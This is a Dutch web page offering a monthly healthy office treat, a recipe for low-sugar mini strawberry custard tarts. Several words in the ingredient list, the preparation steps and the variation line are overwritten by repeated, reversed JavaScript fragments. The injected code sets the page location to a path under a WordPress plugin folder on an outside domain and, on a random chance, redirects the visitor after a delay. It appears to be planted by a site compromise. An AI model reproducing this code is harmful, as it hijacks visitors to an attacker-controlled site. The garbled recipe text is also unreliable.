Gezonde traktaties mei

Voor de maand mei staat de volgende traktatie voor jou en je collega’s op het menu.

Mini-taartjes met aardbeien

Vind jij bakken met seizoensfruit leuk? Dan passen deze leuke mini taartjes met aardbeien bij jou. Ze zijn suikerarm en eiwitrijk, en doordat je vers fruit gebruikt is elk taartje ook nog eens een vitaminebommetje. De portiegrootte is perfect om met een goed geweten te genieten.

Ingrediënten voor 10 taartjes

Gezonde traktaties op het werk: aardbeientaartje - Enerjoy

  • 3 eieren
  • 100 gram witte basterdsuiker
  • 100 gram zelfrijzend bakmeel
  • Snuf zout
  • 1 vanillestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokje
  • 250 ml magere melk
  • 250 ml ongeklopte slagroom
  • 6 eidooiers
  • 250 gram aardbeien
  • Bakvormpjes

Voedingswaarden per taartje

Energie: 226 kcal
Eiwit: 6 gram
Koolhydraten: 20 gram
Vet: 13 gram

Bereiding (60 minuten)

  1. Verwarm de oven voor op 175°;
  2. Mix de eieren met de suiker en het zout in 10 minuten toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een schuimige massa;
  3. Schep in gedeelten het zelfrijzend bakmeel erdoor;
  4. Beboter de vormpjes en strooi er wat bloem over;
  5. Verdeel het beslag over de vormpjes en bak in de oven in 10-15 minuten lichtbruin en gaar;
  6. Maak de custard. Halveer het vanillestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokje en schraap het merg eruit. Verwarm dit met de melk en room;
  7. Haal het mengsel van het vuur zodra het begint te koken. Laat 20 minuten afkoelen en haal dan het vanillestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokje uit de pan;
  8. Kop de eidooiers en suikers los in een kom. Giet de melk langzaam over de eidooiers terwijl je het mengsel klopt;
  9. Maak de pan schoon en giet het mengsel dan weer terug in de pan;
  10. Zet de pan terug op het vuur (tussen laag en middelhoog in) en laat goed warm worden, terwijl je blijft roeren met een houten lepel. Laat het mengsel niet koken, dan gaat het schiften;
  11. Op een gegeven moment gaat het mengsel indikken. Zodra het mengsel blijft plakken op de achterkant van de lepel is de custard klaar (dit kan 10 minuten duren).

Variatie

Vervang de aardbeien door ander fruit. Vervang de suiker door zoetstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof.
Bron recept: www.yummyinmytummy.nl en www.ah.nl